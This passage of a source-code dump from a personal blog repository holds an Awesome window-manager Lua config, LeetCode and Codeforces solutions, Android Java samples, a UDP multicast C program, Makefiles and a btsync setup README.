beautiful.fg_normal ..\"' -sb '#955'\")\n local command = assert(f_reader:read('*a'))\n f_reader:close()\n if command == \"\" then return end\n\n -- Check throught the clients if the title match the desired title\n local desired_title=string.lower(command)\n if desired_title:sub(#desired_title) == '\\n' then\n desired_title = desired_title:sub(0, #desired_title-1)\n end\n for k, c in pairs(client.get()) do\n if c.name then\n local title=string.lower(c.name)\n if title == desired_title then\n for i, v in ipairs(c:tags()) do\n awful.tag.viewonly(v)\n c:raise()\n c.minimized = false\n awful.screen.focus(c.screen)\n awful.client.focus.byidx(0, c)\n return\n end\n end\n end\n end\n end)\n)\n\nclientkeys = awful.util.table.join(\n awful.key({ modkey, }, \"f\", function (c) c.fullscreen = not c.fullscreen end),\n awful.key({ modkey, \"Shift\" }, \"c\", function (c) c:kill() end),\n awful.key({ modkey, \"Control\" }, \"space\", awful.client.floating.toggle ),\n awful.key({ modkey, \"Control\" }, \"Return\", function (c) c:swap(awful.client.getmaster()) end),\n awful.key({ modkey, }, \"o\", awful.client.movetoscreen ),\n awful.key({ modkey, \"Shift\" }, \"r\", function (c) c:redraw() end),\n awful.key({ modkey, }, \"t\", function (c) c.ontop = not c.ontop end),\n awful.key({ modkey, }, \"n\",\n function (c)\n -- The client currently has the input focus, so it cannot be\n -- minimized, since minimized clients can't have the focus.\n c.minimized = true\n end),\n awful.key({ modkey, }, \"m\",\n function (c)\n c.maximized_horizontal = not c.maximized_horizontal\n c.maximized_vertical = not c.maximized_vertical\n end),\n\n -- my own key bindings for client\n awful.key({ \"Mod1\" }, \"F4\", function (c) c:kill() end)\n)\n\n-- Compute the maximum number of digit we need, limited to 9\nkeynumber = 0\nfor s = 1, screen.count() do\n keynumber = math.min(9, math.max(#tags[s], keynumber));\nend\n\n-- Bind all key numbers to tags.\n-- Be careful: we use keycodes to make it works on any keyboard layout.\n-- This should map on the top row of your keyboard, usually 1 to 9.\nfor i = 1, keynumber do\n globalkeys = awful.util.table.join(globalkeys,\n awful.key({ modkey }, \"#\" .. i + 9,\n function ()\n local screen = mouse.screen\n if tags[screen][i] then\n awful.tag.viewonly(tags[screen][i])\n end\n end),\n awful.key({ modkey, \"Control\" }, \"#\" .. i + 9,\n function ()\n local screen = mouse.screen\n if tags[screen][i] then\n awful.tag.viewtoggle(tags[screen][i])\n end\n end),\n awful.key({ modkey, \"Shift\" }, \"#\" .. i + 9,\n function ()\n if client.focus and tags[client.focus.screen][i] then\n awful.client.movetotag(tags[client.focus.screen][i])\n end\n end),\n awful.key({ modkey, \"Control\", \"Shift\" }, \"#\" .. 
i + 9,\n                  function ()\n                      if client.focus and tags[client.focus.screen][i] then\n                          awful.client.toggletag(tags[client.focus.screen][i])\n                      end\n                  end))\nend\n\nclientbuttons = awful.util.table.join(\n    awful.button({ }, 1, function (c) client.focus = c; c:raise() end),\n    awful.button({ modkey }, 1, awful.mouse.client.move),\n    awful.button({ modkey }, 3, awful.mouse.client.resize))\n\n-- Set keys\nroot.keys(globalkeys)\n-- }}}\n\n-- {{{ Rules\nawful.rules.rules = {\n    -- All clients will match this rule.\n    { rule = { },\n      properties = { border_width = beautiful.border_width,\n                     border_color = beautiful.border_normal,\n                     focus = true,\n                     keys = clientkeys,\n                     buttons = clientbuttons } },\n    { rule = { class = \"MPlayer\" },\n      properties = { floating = true } },\n    { rule = { class = \"pinentry\" },\n      properties = { floating = true } },\n    { rule = { class = \"gimp\" },\n      properties = { floating = true } },\n    -- Set Firefox to always map on tags number 2 of screen 1.\n    -- { rule = { class = \"Firefox\" },\n    --   properties = { tag = tags[1][2] } },\n}\n-- }}}\n\n-- {{{ Signals\n-- Signal function to execute when a new client appears.\nclient.add_signal(\"manage\", function (c, startup)\n    -- Add a titlebar\n    -- awful.titlebar.add(c, { modkey = modkey })\n\n--     -- Enable sloppy focus\n--     c:add_signal(\"mouse::enter\", function(c)\n--         if awful.layout.get(c.screen) ~= awful.layout.suit.magnifier\n--             and awful.client.focus.filter(c) then\n--             client.focus = c\n--         end\n--     end)\n\n    if not startup then\n        -- Set the windows at the slave,\n        -- i.e. put it at the end of others instead of setting it master.\n        -- awful.client.setslave(c)\n\n        -- Put windows in a smart way, only if they do not set an initial position.\n        if not c.size_hints.user_position and not c.size_hints.program_position then\n            awful.placement.no_overlap(c)\n            awful.placement.no_offscreen(c)\n        end\n    end\nend)\n\nclient.add_signal(\"focus\", function(c) c.border_color = beautiful.border_focus end)\nclient.add_signal(\"unfocus\", function(c) c.border_color = beautiful.border_normal end)\n-- }}}\n\n-- save the unfocused client and restore it when alt+tab is pressed\nprevious_client = nil\ncurrent_screen = nil\nclient.add_signal(\"unfocus\", function(c) previous_client = c end)\n\nfunction batteryInfo(adapter)\n    local ffile_name = \"charge\"\n    local fpath = \"/sys/class/power_supply/\"..adapter..\"/\" \n    local fcur = io.open(fpath..ffile_name..\"_now\")\n    if fcur == nil then\n        ffile_name = \"energy\"\n        fcur = io.open(fpath..ffile_name..\"_now\")\n    end\n    local fcap = io.open(fpath..ffile_name..\"_full\")\n    local fsta = io.open(fpath..\"status\")\n\n    local cur = fcur:read()\n    local cap = fcap:read()\n    local sta = fsta:read()\n    local perc = math.floor(cur * 100 / cap)\n    if perc > 100 then\n        perc = 100\n    end\n    if sta:match(\"Charging\") then\n        batterywidget.text = '<span color=\"green\"> ⚡' .. perc .. '% </span> '\n    elseif sta:match(\"Discharging\") then\n        if perc < 15 then\n            batterywidget.text = '<span color=\"red\"> ⚡' .. perc .. '% </span> '\n        elseif perc < 50 then\n            batterywidget.text = '<span color=\"yellow\"> ⚡' .. perc .. '% </span> '\n        else\n            batterywidget.text = '<span> ⚡' .. perc .. '% </span> '\n        end\n    else\n        batterywidget.text = '<span> ⚡' .. perc .. 
'% </span> '\n end\n fcur:close()\n fcap:close()\n fsta:close()\nend\n\nbatteryInfo(\"BAT0\")\nawful.hooks.timer.register(86, function() batteryInfo(\"BAT0\") end)\n" }, { "alpha_fraction": 0.5009709000587463, "alphanum_fraction": 0.5637540221214294, "avg_line_length": 30.53061294555664, "blob_id": "d8aae4167988780a4c824f9e69db652d48cb5fec", "content_id": "665f80002aa300252a1de90756e406200fe13cd6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1545, "license_type": "permissive", "max_line_length": 223, "num_lines": 49, "path": "/algorithm/leetcode/1_two_sum.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "/*\n *\n * http://leetcode.com/onlinejudge#question_1\n *\n * Two SumMar 14 '116343 / 20069\n *\n * Given an array of integers, find two numbers such that they add up to a specific target number.\n *\n * The function twoSum should return indices of the two numbers such that they add up to the target, where index1 must be less than index2. Please note that your returned answers (both index1 and index2) are not zero-based.\n *\n * You may assume that each input would have exactly one solution.\n *\n * Input: numbers={2, 7, 11, 15}, target=9\n * Output: index1=1, index2=2\n * \n */\n\n#include <iostream>\n#include <vector>\n\nusing namespace std;\n\nclass Solution {\n public:\n vector<int> twoSum(vector<int> &numbers, int target) {\n vector<int> result;\n for(int i = 0; i < numbers.size(); ++i) {\n for(int j = i+1; j < numbers.size(); ++j) {\n if(numbers[i] + numbers[j] == target) {\n result.push_back(i+1);\n result.push_back(j+1);\n break;\n }\n }\n }\n return result;\n }\n};\n\nint main(int argc, const char *argv[]) {\n Solution s;\n int array[] = //{2, 7, 11, 15};\n {678,227,764,37,956,982,118,212,177,597,519,968,866,121,771,343,561};//, 295\n vector<int> v(array, array+sizeof(array)/sizeof(array[0]));\n vector<int> r = s.twoSum(v, 295);\n for(vector<int>::const_iterator iter = r.begin(); iter != r.end(); ++iter)\n cout << *iter;\n return 0;\n}\n" }, { "alpha_fraction": 0.7119740843772888, "alphanum_fraction": 0.7173678278923035, "avg_line_length": 24.76388931274414, "blob_id": "1afb70b7f7fab66820f4a590ff93c9bf0dd9ef76", "content_id": "64a612618c33818256c8c8c4b6afcccd11b8a593", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1854, "license_type": "permissive", "max_line_length": 72, "num_lines": 72, "path": "/android/rpc-with-service/app2/src/com/rmd/app2/App2Main.java", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "package com.rmd.app2;\n\nimport android.app.Activity;\nimport android.content.ComponentName;\nimport android.content.Context;\nimport android.content.Intent;\nimport android.content.ServiceConnection;\nimport android.os.Bundle;\nimport android.os.IBinder;\nimport android.os.RemoteException;\nimport android.util.Log;\nimport android.view.View;\nimport android.widget.Button;\n\nimport com.rmd.ISvcController;\n\npublic class App2Main extends Activity {\n\tprivate ISvcController svc = null;\n\tServiceConnection con = null;\n\n\t/** Called when the activity is first created. 
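Wires up two buttons: one binds this activity to the app's own App2Service via bindService(), the other calls the AIDL methods foo() and bar() on the ISvcController proxy obtained in onServiceConnected(). 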
*/\n\t@Override\n\tpublic void onCreate(Bundle savedInstanceState) {\n\t\tsuper.onCreate(savedInstanceState);\n\t\tsetContentView(R.layout.main);\n\t\tLog.v(\"App2\", \"App2Main activity create.\");\n\n\t\tcon = new ServiceConnection() {\n\n\t\t\t@Override\n\t\t\tpublic void onServiceDisconnected(ComponentName name) {\n\t\t\t\tLog.v(\"App2\", \"App2Main Service Disconnected\");\n\t\t\t}\n\n\t\t\t@Override\n\t\t\tpublic void onServiceConnected(ComponentName name, IBinder service) {\n\t\t\t\tLog.v(\"App2\", \"App2Main Service Connected.\");\n\t\t\t\tLog.v(\"App2\", service.getClass().toString() + \"\\t hash code: \"\n\t\t\t\t\t\t+ service.hashCode());\n\t\t\t\tsvc = ISvcController.Stub.asInterface(service);\n\t\t\t}\n\t\t};\n\n\t\tButton btnStartSelf = (Button) findViewById(R.id.btnStartSelf);\n\t\tbtnStartSelf.setOnClickListener(new View.OnClickListener() {\n\t\t\tpublic void onClick(View v) {\n\t\t\t\tIntent i = new Intent(v.getContext(), App2Service.class);\n\n\t\t\t\tv.getContext().bindService(i, con, Context.BIND_AUTO_CREATE);\n\t\t\t}\n\t\t});\n\n\t\tButton btnCallRPC = (Button) findViewById(R.id.btnCallRPC);\n\t\tbtnCallRPC.setOnClickListener(new View.OnClickListener() {\n\t\t\tpublic void onClick(View v) {\n\t\t\t\ttry {\n\t\t\t\t\tsvc.foo(\"hello\");\n\t\t\t\t\tsvc.bar(\"raymond\");\n\t\t\t\t} catch (RemoteException ex) {\n\n\t\t\t\t}\n\t\t\t}\n\t\t});\n\n\t}\n\n\t@Override\n\tprotected void onStop() {\n\t\tunbindService(con);\n\t\tsuper.onStop();\n\t}\n}" }, { "alpha_fraction": 0.6702127456665039, "alphanum_fraction": 0.6843971610069275, "avg_line_length": 34.74647903442383, "blob_id": "a221e66318eefd20b7c98921ec310536d7909912", "content_id": "0cffe93405409c1d4a0b5e95127ee1e16cbe5877", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2558, "license_type": "permissive", "max_line_length": 945, "num_lines": 71, "path": "/algorithm/codeforces/2/2a.py", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nhttp://codeforces.com/problemset/problem/2/a\n\nA. Winner\ntime limit per test\n1 second\nmemory limit per test\n64 megabytes\ninput\nstandard input\noutput\nstandard output\n\nThe winner of the card game popular in Berland \"Berlogging\" is determined according to the following rules. If at the end of the game there is only one player with the maximum number of points, he is the winner. The situation becomes more difficult if the number of such players is more than one. During each round a player gains or loses a particular number of points. In the course of the game the number of points is registered in the line \"name score\", where name is a player's name, and score is the number of points gained in this round, which is an integer number. If score is negative, this means that the player has lost in the round. So, if two or more players have the maximum number of points (say, it equals to m) at the end of the game, than wins the one of them who scored at least m points first. Initially each player has 0 points. It's guaranteed that at the end of the game at least one player has a positive number of points.\nInput\n\nThe first line contains an integer number n (1  ≤  n  ≤  1000), n is the number of rounds played. 
Then follow n lines, containing the information about the rounds in \"name score\" format in chronological order, where name is a string of lower-case Latin letters with the length from 1 to 32, and score is an integer number between -1000 and 1000, inclusive.\nOutput\n\nPrint the name of the winner.\nSample test(s)\nInput\n\n3\nmike 3\nandrew 5\nmike 2\n\nOutput\n\nandrew\n\nInput\n\n3\nandrew 3\nandrew 2\nmike 5\n\nOutput\n\nandrew\n\"\"\"\n\n\ndef index_of_number_no_smaller_than(array, num):\n    for i in xrange(len(array)):\n        if array[i] >= num:\n            return i\n\nif __name__ == \"__main__\":\n    score_board = {}\n    rounds = int(raw_input())\n    for i in xrange(rounds):\n        (name, score) = tuple(raw_input().split())\n        score = int(score)\n        if not score_board.has_key(name):\n            score_board[name]= [0 for j in xrange(i+1)]\n        for (n, r) in score_board.items():\n            if n == name:\n                r.append(r[-1]+score)\n            else:\n                r.append(r[-1])\n\n    m = max(r[-1] for r in score_board.itervalues())\n    candidates = filter(lambda (n, r) : r[-1] == m, score_board.items())\n    candidates = [(n, index_of_number_no_smaller_than(r, m)) for (n, r) in candidates]\n    (name, index) = min(candidates, key=lambda (n, i): i)\n    print name\n" }, { "alpha_fraction": 0.7573033571243286, "alphanum_fraction": 0.7573033571243286, "avg_line_length": 20.25, "blob_id": "5822ecbc78b0f2064e5df6bce1c5bd54676523d6", "content_id": "590c4c19dffa7255cfbf26093cf4098807f42fcf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 445, "license_type": "permissive", "max_line_length": 63, "num_lines": 20, "path": "/android/drag/src/com/rmd/drag/TouchInterceptor.java", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "package com.rmd.drag;\r\n\r\nimport android.content.Context;\r\nimport android.util.AttributeSet;\r\nimport android.view.MotionEvent;\r\nimport android.widget.LinearLayout;\r\n\r\npublic class TouchInterceptor extends LinearLayout {\r\n\r\n\tpublic TouchInterceptor(Context context, AttributeSet attrs) {\r\n\t\tsuper(context, attrs);\r\n\t}\r\n\t\r\n\t@Override\r\n\tpublic boolean onInterceptTouchEvent(MotionEvent ev) {\r\n\t\t\r\n\t\treturn super.onInterceptTouchEvent(ev);\r\n\t}\r\n\r\n}\r\n" }, { "alpha_fraction": 0.7058823704719543, "alphanum_fraction": 0.7294117808341980, "avg_line_length": 26.33333396911621, "blob_id": "0221e61c2e9b0721351431af5ad84b64b7f02d21", "content_id": "3489f8f8a94aa52ccbb757fa4660d389f5d1c867", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 170, "license_type": "permissive", "max_line_length": 43, "num_lines": 6, "path": "/algorithm/i2a_ex_15.4-5/Makefile", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "EXENAME = ex15_4_5\r\nM = dbg\r\n#UNITTESTEXENAME = entry_source_name\r\n#SRCEXTENSION = cpp \r\n#EXTERNALLIBS += additional_libs_to_include\r\ninclude\t$(MAKEFILE_ROOT)\\common.mk\r\n" }, { "alpha_fraction": 0.5596910119056702, "alphanum_fraction": 0.5835674405097961, "avg_line_length": 21.595237731933594, "blob_id": "c9e1f54601d15d1fef793ae3705dd43625660e23", "content_id": "b88a0504347231364ce7da5a9c38addaf53537d0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2848, "license_type": "permissive", "max_line_length": 72, "num_lines": 126, "path": "/networking/multicast.c", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": " #ifdef WIN32\r\n\r\n#include 
<stdio.h>\r\n#include <tchar.h>\r\n#include <winsock2.h>\r\n#include <ws2tcpip.h>\r\n#pragma comment(lib, \"Ws2_32.lib\")\r\n\r\n#elif defined WINCE\r\n\r\n#include <stdio.h>\r\n#include <tchar.h>\r\n#include <winsock2.h>\r\n#include <ws2tcpip.h>\r\n#pragma comment(lib, \"Ws2.lib\")\r\n\r\n#else\r\n\r\n#include <strings.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h> \r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <stdio.h>\r\n\r\n#endif\r\n\r\n#define PORT 6789\r\n#define GROUPIP \"239.0.1.2\"\r\n\r\n#if WINCE || WIN32 \r\nint wmain(int argc, _TCHAR* argv[])\r\n#else\r\nint main(int argc, char* argv[])\r\n#endif\r\n{\t\r\n\tstruct sockaddr_in addr;\r\n\tint addrlen, sock, count;\r\n\tstruct ip_mreq mreq;\r\n\tchar message[50];\r\n\r\n#if WINCE || WIN32 \r\n\tWSADATA wsaData;\r\n\tint iResult;\r\n\r\n\t// Initialize Winsock\r\n\tiResult = WSAStartup(MAKEWORD(2,2), &wsaData);\r\n\tif (iResult != 0) {\r\n\t\tprintf(\"WSAStartup failed: %d\\n\", iResult);\r\n\t\treturn 1;\r\n\t}\r\n#endif\r\n\r\n\tsock = socket(AF_INET, SOCK_DGRAM, 0);\r\n\tif (sock < 0) {\r\n\t\tprintf(\"failed to create socket\");\r\n\t\texit(1);\r\n\t}\r\n\r\n#if WINCE || WIN32 \r\n\tZeroMemory((char *)&addr, sizeof(addr));\r\n#else\r\n\tbzero((char *)&addr, sizeof(addr));\r\n#endif\r\n\taddr.sin_family = AF_INET;\r\n\taddr.sin_addr.s_addr = htonl(INADDR_ANY);\r\n\taddr.sin_port = htons(PORT);\r\n\taddrlen = sizeof(addr);\r\n\r\n\tif (argc > 1) {\r\n\t\t// sender\r\n\t\tstatic int i = 0;\r\n unsigned char ttl = 32;\r\n setsockopt(sock, IPPROTO_IP, IP_MULTICAST_TTL, &ttl,\r\n sizeof(unsigned char));\r\n\t\taddr.sin_addr.s_addr = inet_addr(GROUPIP);\r\n\t\twhile (1) {\r\n\t\t\tsprintf(message, \"counter is %d\", ++i);\r\n\t\t\tprintf(\"sending: %s\\n\", message);\r\n\t\t\tcount = sendto(sock, message, sizeof(message), 0,\r\n\t\t\t\t(struct sockaddr *) &addr, addrlen);\r\n\t\t\tif (count < 0) {\r\n\t\t\t\tprintf(\"failed to sendto\");\r\n\t\t\t\texit(1);\r\n\t\t\t}\r\n#if WINCE || WIN32 \r\n\t\t\tSleep(2000);\r\n#else\t\t\t\r\n sleep(2);\r\n#endif\r\n\t\t}\r\n\t} else {\r\n\t\t// receiver\r\n\t\tconst int on = 1;\r\n\t\tif (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR,\r\n\t\t\t(char*)&on, sizeof(on)) < 0) {\r\n\t\t\t\tprintf(\"failed to setsockopt SO_REUSEADDR\");\r\n\t\t\t\texit(1);\r\n\t\t}\r\n\t\tif (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) { \r\n\t\t\tprintf(\"failed to bind\");\r\n\t\t\texit(1);\r\n\t\t} \r\n\t\tmreq.imr_multiaddr.s_addr = inet_addr(GROUPIP); \r\n\t\tmreq.imr_interface.s_addr = htonl(INADDR_ANY); \r\n\t\tif (setsockopt(sock, IPPROTO_IP, IP_ADD_MEMBERSHIP,\r\n\t\t\t(char*)&mreq, sizeof(mreq)) < 0) {\r\n\t\t\t\tprintf(\"failed to setsockopt mreq\");\r\n\t\t\t\texit(1);\r\n\t\t} \r\n\t\twhile (1) {\r\n\t\t\tcount = recvfrom(sock, message, sizeof(message), 0, \r\n\t\t\t\t(struct sockaddr *) &addr, &addrlen);\r\n\t\t\tif (count < 0) {\r\n\t\t\t\tprintf(\"failed to recvfrom\");\r\n\t\t\t\texit(1);\r\n\t\t\t} else if (count == 0) {\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\tprintf(\"%s: message = \\\"%s\\\"\\n\", inet_ntoa(addr.sin_addr), message);\r\n\t\t}\r\n\t}\r\n\r\n\treturn 0;\r\n}\r\n" }, { "alpha_fraction": 0.747863233089447, "alphanum_fraction": 0.747863233089447, "avg_line_length": 45.79999923706055, "blob_id": "e76359acfbe9d15ec964e133e328723d5087ddc2", "content_id": "0d0923beff422e5e3d888687dcd3329c6b02d4a3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 234, "license_type": 
"permissive", "max_line_length": 59, "num_lines": 5, "path": "/settings/btsync/README.md", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "- copy [btsync](https://www.getsync.com/) to /usr/local/bin\n- copy start_btsync.sh to /usr/local/bin\n- copy btsync.service to /etc/systemd/system\n- run sudo systemctl enable btsync\n- access http://ip to visit btsync management portal\n" }, { "alpha_fraction": 0.6842105388641357, "alphanum_fraction": 0.6842105388641357, "avg_line_length": 16.538461685180664, "blob_id": "ed029e2ef6d0458722b83937027a094da6b5fb0e", "content_id": "4fd58c505b34dbb420e02ff4303770f1b512f56e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 228, "license_type": "permissive", "max_line_length": 31, "num_lines": 13, "path": "/android/read_system_property_with_jni/jni/Android.mk", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "LOCAL_PATH := $(call my-dir)\n\ninclude $(CLEAR_VARS)\nLOCAL_MODULE := libsysproperty\nLOCAL_C_INCLUDES := \n\nLOCAL_LDLIBS := -llog\nLOCAL_CFLAGS := -DDEBUG -g\n\nLOCAL_SRC_FILES := \\\n\tsys_property.c\n\ninclude $(BUILD_SHARED_LIBRARY)\n" }, { "alpha_fraction": 0.7132616639137268, "alphanum_fraction": 0.7284946441650391, "avg_line_length": 23.799999237060547, "blob_id": "0232b524439436ebf5609b0c1f5dd41a1c30edab", "content_id": "116b85ff04e2e5e1c223f319f17ece3d9f54ded9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1148, "license_type": "permissive", "max_line_length": 278, "num_lines": 45, "path": "/algorithm/codeforces/1/1a.py", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n\nhttp://codeforces.com/problemset/problem/1/A\n\nA. Theatre Square\ntime limit per test2 seconds\nmemory limit per test64 megabytes\ninputstandard input\noutputstandard output\nTheatre Square in the capital city of Berland has a rectangular shape with the size n × m meters. On the occasion of the city's anniversary, a decision was taken to pave the Square with square granite flagstones. Each flagstone is of the size a × a.\n\nWhat is the least number of flagstones needed to pave the Square? It's allowed to cover the surface larger than the Theatre Square, but the Square has to be covered. It's not allowed to break the flagstones. 
The sides of flagstones should be parallel to the sides of the Square.\n\nInput\nThe input contains three positive integer numbers in the first line: n,  m and a (1 ≤  n, m, a ≤ 109).\n\nOutput\nWrite the needed number of flagstones.\n\nSample test(s)\ninput\n6 6 4\noutput\n4\n\n\"\"\"\n\nimport math\n\ns = raw_input()\n\n(w,h,e)=s.split()\nw = int(w)\nh = int(h)\ne = int(e)\n\n#print w, h, e\n\nx = int(math.ceil(1.0*w/e))\ny = int(math.ceil(1.0*h/e))\n\nprint x*y\n" }, { "alpha_fraction": 0.5503783226013184, "alphanum_fraction": 0.5882118940353394, "avg_line_length": 31.399999618530273, "blob_id": "4ca6a2318eea9fdd5400447d071e2c7d0cd1a645", "content_id": "c82786332cac40aabbd698b2a30c8fd2e8b0c759", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5026, "license_type": "permissive", "max_line_length": 278, "num_lines": 155, "path": "/algorithm/codeforces/1/1c.py", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nhttp://codeforces.com/problemset/problem/1/C\n\nC. Ancient Berland Circus\ntime limit per test\n2 seconds\nmemory limit per test\n64 megabytes\ninput\nstandard input\noutput\nstandard output\n\nNowadays all circuses in Berland have a round arena with diameter 13 meters, but in the past things were different.\n\nIn Ancient Berland arenas in circuses were shaped as a regular (equiangular) polygon, the size and the number of angles could vary from one circus to another. In each corner of the arena there was a special pillar, and the rope strung between the pillars marked the arena edges.\n\nRecently the scientists from Berland have discovered the remains of the ancient circus arena. They found only three pillars, the others were destroyed by the time.\n\nYou are given the coordinates of these three pillars. Find out what is the smallest area that the arena could have.\nInput\n\nThe input file consists of three lines, each of them contains a pair of numbers –– coordinates of the pillar. Any coordinate doesn't exceed 1000 by absolute value, and is given with at most six digits after decimal point.\nOutput\n\nOutput the smallest possible area of the ancient arena. This number should be accurate to at least 6 digits after the decimal point. 
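(Approach used in the code below: compute the three side lengths, the triangle area via Heron's formula, the circumradius r = a*b*c/(4*S), then the triangle's angles via the law of cosines; twice the GCD of those angles is the polygon's central angle g, and the answer is (2*pi/g) * r*r*sin(g)/2.) 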
It's guaranteed that the number of angles in the optimal polygon is not larger than 100.\nSample test(s)\nInput\n\n0.000000 0.000000\n1.000000 1.000000\n0.000000 1.000000\n\nOutput\n\n1.00000000\n\n\"\"\"\n\nimport math\n\nclass Point(object):\n    def __init__(self, x, y):\n        self.x = x*1.0\n        self.y = y*1.0\n\n    def GetDistance(self, p2):\n        dx = self.x - p2.x\n        dy = self.y - p2.y\n        return math.sqrt(dx*dx+dy*dy)\n\n    def __str__(self):\n        return '['+str(self.x)+','+str(self.y)+']'\n\nclass LineEquation(object):\n    def __init__(self, p1, p2):\n        self.type = 0 # 0: general form, 1: vertical line, 2: horizontal line\n        self.p1 = p1\n        self.p2 = p2\n        if p1.x == p2.x:\n            self.type = 1 # vertical\n            self.x = p1.x\n        elif p1.y == p2.y:\n            self.type = 2 # horizontal\n            self.y = p1.y\n        else:\n            self.type = 0\n            self.slope = (p2.y-p1.y)/(p2.x-p1.x)\n            self.intercept = p2.y-self.slope*p2.x\n            #print \"%f %f %f %f %f %f\"%(p1.x, p1.y, p2.x, p2.y, self.slope, self.intercept)\n\n    def GetMidperpendicular(self):\n        result = None\n        mid_x = (self.p1.x+self.p2.x)/2\n        mid_y = (self.p1.y+self.p2.y)/2\n        if self.type == 1:\n            result = LineEquation(Point(0, mid_y), Point(1, mid_y))\n        elif self.type == 2:\n            result = LineEquation(Point(mid_x, 0), Point(mid_x, 1))\n        else:\n            slope = -1/self.slope\n            result = LineEquation(Point(mid_x, mid_y), Point(mid_x-1, mid_y-slope))\n        return result\n\n    def GetCrossPoint(self, line):\n        x = 0\n        y = 0\n        if (self.type == 1 and line.type == 1) \\\n                or (self.type == 2 and line.type == 2) \\\n                or (self.type == 0 and line.type == 0 and (abs(self.slope - line.slope) < 0.0000001)):\n            return None\n        if self.type == 1:\n            x = self.x\n            y = line.slope*x+line.intercept\n        elif line.type == 1:\n            return line.GetCrossPoint(self)\n        elif self.type == 2:\n            y = self.y\n            x = (y-line.intercept)/line.slope\n        elif line.type == 2:\n            return line.GetCrossPoint(self)\n        else:\n            x = (line.intercept-self.intercept)/(self.slope-line.slope)\n            y = line.slope*x+line.intercept\n        return Point(x,y)\n\n    def __str__(self):\n        if self.type == 0:\n            return 'y=' + str(self.slope) + '*x+' + str(self.intercept)\n        elif self.type == 1:\n            return 'x=' + str(self.x)\n        else:\n            return 'y=' + str(self.y)\n\ndef get_area_with_herons_formula(a, b, c):\n    p = (a+b+c)/2\n    s = math.sqrt(p*(p-a)*(p-b)*(p-c))\n    return s\n\ndef get_radius(a, b, c, s):\n    return a*b*c/(4*s)\n\ndef get_radian_of_triangle_with_law_of_cosines(a, b, c):\n    r1 = math.acos((b**2+c**2-a**2)/(2*b*c))\n    r2 = math.acos((c**2+a**2-b**2)/(2*c*a))\n    r3 = math.acos((a**2+b**2-c**2)/(2*b*a))\n    return r1, r2, r3\n\ndef get_gcd(a, b):\n    if b < math.pi/100:\n        return a\n    return get_gcd(b, math.fmod(a, b))\n\nif __name__ == \"__main__\":\n\n    coords = raw_input().split()\n    p1 = Point(float(coords[0]), float(coords[1]))\n    coords = raw_input().split()\n    p2 = Point(float(coords[0]), float(coords[1]))\n    coords = raw_input().split()\n    p3 = Point(float(coords[0]), float(coords[1]))\n\n    a = p1.GetDistance(p2)\n    b = p2.GetDistance(p3)\n    c = p3.GetDistance(p1)\n    s = get_area_with_herons_formula(a, b, c)\n    r = get_radius(a, b, c, s)\n    r1, r2, r3 = get_radian_of_triangle_with_law_of_cosines(a, b, c)\n    r = a/2.0/math.sin(r1)\n    rgcd = 2.0*get_gcd(r1, get_gcd(r2, r3))\n    result = r*r*math.sin(rgcd)/2*(2*math.pi/rgcd)\n    print (\"%.6f\"%result)\n" }, { "alpha_fraction": 0.7191011309623718, "alphanum_fraction": 0.7191011309623718, "avg_line_length": 13.833333015441895, "blob_id": "ea0092c099f2c0a8bf7947a035b42a4055049715", "content_id": "3e8443c8434bef4323c9336df1a55e2be6414f77", "detected_licenses": [ "MIT" ], "is_generated": false, 
